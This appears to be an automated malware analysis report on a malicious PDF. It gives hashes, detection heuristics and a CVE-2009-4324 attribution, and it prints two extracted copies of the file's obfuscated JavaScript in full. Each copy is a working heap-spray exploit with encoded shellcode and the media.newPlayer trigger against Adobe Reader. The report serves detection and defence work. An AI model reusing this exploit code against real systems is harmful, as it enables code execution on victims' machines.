Malicious PDF — malware analysis report

Static analysis result for SHA-256 cb635f491b7c20c8…

MALICIOUS

PDF

644.3 KB Created: 2009-07-08 10:53:46 +08:00 Authoring application: Acrobat Distiller 7.0 (Windows) First seen: 2026-05-11
MD5: fd7ccfbaa1acf4cf4a0fe27c36e5594a SHA-1: c621247f6e643e67df23f2d650735c56d1de5b10 SHA-256: cb635f491b7c20c89b26676c7ce5a7ec3f93e1f93bad094a876b25bab6e13e97
208 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, which is a common technique for delivering second-stage payloads. The embedded JavaScript stream, named 'javascript_obj0017_000.js', is likely responsible for downloading and executing a malicious payload from a remote server, although the exact URL is not directly visible in the provided evidence. The presence of JavaScript actions and streams strongly suggests an attempt to exploit the PDF viewer or trick the user into executing malicious code.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 6

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdfx/1.3/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0017_000.js pdf-javascript-stream PDF /JS object 17 at offset 0x4DA 3010 bytes
SHA-256: 3238ab43d64be757f86271f073632d6616e7da29a9a1d53b880c68b34a7f9c55
Preview script
First 1,000 lines of the extracted script
var unes=unescape
var pGvRIJZpqdN =  unes("%u4143%u494b%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9"+
"\x25\x75EBFA\x25\x75E805\x25\x75FFEB\x25\x75FFFF"+
"%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9"+
"%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF"+
"%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06"+
"%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF"+
"%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791"+
"%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA"+
"%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601"+
"%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993"+
"%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD"+
"%uF901%u328D%uF993%uF993%uF993%uFD93%u8F06%u06BD"+
"%uEDAF%uBF70%u7AB1%uF901%u4C8D%uC178%uA9DC%uBFBD"+
"%uB772%u8CC5%u7854%uF941%uF9EB%uA9F9%uA99D%u8CBD"+
"%u7858%uFD41%uF9EB%u16F9%u1307%u8C57%u406C%uFFF9"+
"%uF9F9%u1578%uF1F9%uF9F9%uAEAF%u0972%u3F78%uEBE9"+
"%uF9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9"+
"%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608"+
"%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D"+
"%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589"+
"%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD"+
"%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9"+
"%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD"+
"%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5"+
"%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D"+
"%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72"+
"%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372"+
"%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C"+
"%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");
var AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc = unes("\x25\x750\x630\x63\x25\x750\x630\x63");
var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE = unes("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.length <= 32768) AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc+=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc;
	AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.substring(0,32768 - pGvRIJZpqdN.length);

memory=new Array();

for(i=0;i<0x2000;i++) {
	memory[i]= AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc + pGvRIJZpqdN;
}

util["\x70\x72\x69\x6e\x74\x64"]("FGgITeSFZAjpOsSyXgoMbUZttCRxNEDbuZjH", new Date());
util["\x70\x72\x69\x6e\x74\x64"]("PAAhBAPMqrBpJVqRwqwcuxjWkEUEcZdEnvdP", new Date());
try {this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {}
util["\x70\x72\x69\x6e\x74\x64"](QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE, new Date());
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 17 at offset 0x4DA 2846 bytes
SHA-256: 232609848e0f234d683c26067d589f0acfc0634e7aca3249995336282f74bea1
Preview script
First 1,000 lines of the extracted script
var unes=unescape
var pGvRIJZpqdN =  unes("%u4143%u494b%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9%uEBFA%uE805%uFFEB%uFFFF%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD%uF901%u328D%uF993%uF993%uF993%uFD93%u8F06%u06BD%uEDAF%uBF70%u7AB1%uF901%u4C8D%uC178%uA9DC%uBFBD%uB772%u8CC5%u7854%uF941%uF9EB%uA9F9%uA99D%u8CBD%u7858%uFD41%uF9EB%u16F9%u1307%u8C57%u406C%uFFF9%uF9F9%u1578%uF1F9%uF9F9%uAEAF%u0972%u3F78%uEBE9%uF9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");
var AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc = unes("\x25\x750\x630\x63\x25\x750\x630\x63");
var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE = unes("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.length <= 32768) AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc+=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc;
	AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.substring(0,32768 - pGvRIJZpqdN.length);

memory=new Array();

for(i=0;i<0x2000;i++) {
	memory[i]= AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc + pGvRIJZpqdN;
}

util["\x70\x72\x69\x6e\x74\x64"]("FGgITeSFZAjpOsSyXgoMbUZttCRxNEDbuZjH", new Date());
util["\x70\x72\x69\x6e\x74\x64"]("PAAhBAPMqrBpJVqRwqwcuxjWkEUEcZdEnvdP", new Date());
try {this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {}
util["\x70\x72\x69\x6e\x74\x64"](QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE, new Date());